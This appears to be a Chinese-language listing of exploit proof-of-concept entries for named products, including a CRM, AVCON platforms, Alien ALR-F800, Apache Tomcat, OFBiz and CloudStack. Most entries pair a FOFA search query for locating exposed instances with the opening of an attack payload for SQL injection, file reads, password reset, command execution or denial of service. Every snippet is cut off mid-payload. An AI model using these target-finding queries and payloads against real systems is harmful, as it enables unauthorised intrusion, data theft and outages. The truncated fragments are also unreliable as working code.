B1-1帮管家-CRM-SQL 漏洞描述: 帮管客CRM 客户管理系统/index.php/jiliyu 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。 网站图片: 网络测绘: fofa语法: FOFA:app=“帮管客-CRM” 漏洞复现: payload: GE
A44-1Avcon-系统管理平台-任意文件读取 漏洞描述: AVCON-系统管理平台download.action存在任意文件读取漏洞,通过该漏洞读取配置文件信息,造成信息泄露漏洞 fofa语法: title=“AVCON-系统管理平台” 漏洞复现: payload: GET /download.
A43-2Avcon-网络视频服务系统-PermissionAC 漏洞描述: AVCON-网络视频服务系统通过接口 /avcon/av_user/editusercommit.php?currentpage=1 重置admin用户的密码,从而登录系统后台。 fofa语法: title==“avcon
A42-2Alien-ALR-F800-RCE 漏洞描述: Alien Technology ALR-F800存在命令执行漏洞 fofa语法: “ALR-F800” 漏洞复现: payload: POST /cmd.php HTTP/1.1 Host: Accept-Ldwk: bG91ZG9uZ
A42-1Alien-ALR-F800-反序列化RCE 漏洞描述: Alien Technology ALR-F800存在命令注入漏洞 fofa语法: “ALR-F800” 漏洞复现: payload: POST /cmd.php HTTP/1.1 Host: Accept-Ldwk: bG91Z
A41-1Apache-HTTPServer-身份验证绕过 漏洞复现: payload: import requests # Configuration proxy_url = "http://proxy-server.example.com" # Change this to the prox
A40-1Apache-Tomcat-拒绝服务 漏洞复现: payload: import http.client # Configuration host = "target-server" # Change this to the target server address port = 4
A39-2ApacheOFBiz–RCE 漏洞描述: 2024年8月,互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏
A37-1ApacheSolr-log-InformationLeakage 漏洞复现: payload: http://ip/lan.html http://ip/export.html http://ip/email.html http://ip/sms.html
A36-1Apache-CloudStack-PermissionAC 漏洞描述: Apache软件基金会发布了一则关于其开源云计算平台Apache CloudStack的严重漏洞(CVE-2024-41107)的安全公告。此漏洞影响安全断言标记语言(SAML)认证机制,可能允许攻击者绕过认证,获得
